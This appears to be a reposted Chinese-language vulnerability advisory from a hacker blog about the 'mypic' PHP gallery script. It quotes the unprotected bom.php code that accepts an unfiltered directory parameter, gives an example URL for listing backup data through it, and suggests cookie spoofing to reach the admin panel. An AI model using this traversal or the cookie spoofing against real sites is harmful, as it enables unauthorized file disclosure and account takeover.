漏洞作者:幻泉[B.S.N]
源码下载: http://bbs.diqiye.com/thread-1731-1-1.html
(官方比较变态注册还需要半个小时回复才能下载另一个下载连接http://down.cnzz.cn/Info/47339.aspx)
官方网站: http://www.diqiye.com/mypic/
漏洞等级:中高
漏洞说明:
/bom.php (文件没做任何访问限制)
if (isset($_GET['dir'])){ //config the basedir
$basedir=$_GET['dir'];//这个没做过滤可以输入任何目录
}else{
$basedir = '.';
}
$auto = 1;
checkdir($basedir);
function checkdir($basedir){
if ($dh = opendir($basedir)) {
while (($file = readdir($dh)) !== false) {
if ($file != '.' && $file != '..'){
if (!is_dir($basedir."/".$file)) {
echo "filename: $basedir/
$file ".checkBOM("$basedir/$file")." <br>";
}else{
$dirname = $basedir."/".
$file;
checkdir($dirname);
}
}
}
closedir($dh);
}
}
......
function rewrite ($filename, $data) {
$filenum = fopen($filename, "w");
flock($filenum, LOCK_EX);
fwrite($filenum, $data);
fclose($filenum);
}
利用
http://127.0.0.1/mypic1/bom.php?dir=./data/bak/
效果
之后又看了看,后台应该是cookie判断的。所以可以尝试cookie欺骗登陆后台。
密码是双md5 除去后面一部分字符 获得的 ,所以没办法破解。
原创文章如转载,请注明:转载自心动吧黑客BLOG [ http://www.abcxd.com/abcxd/ ]
本文链接地址:http://www.abcxd.com/abcxd/abcxdArticle/PHPoday/mypicv2.1.html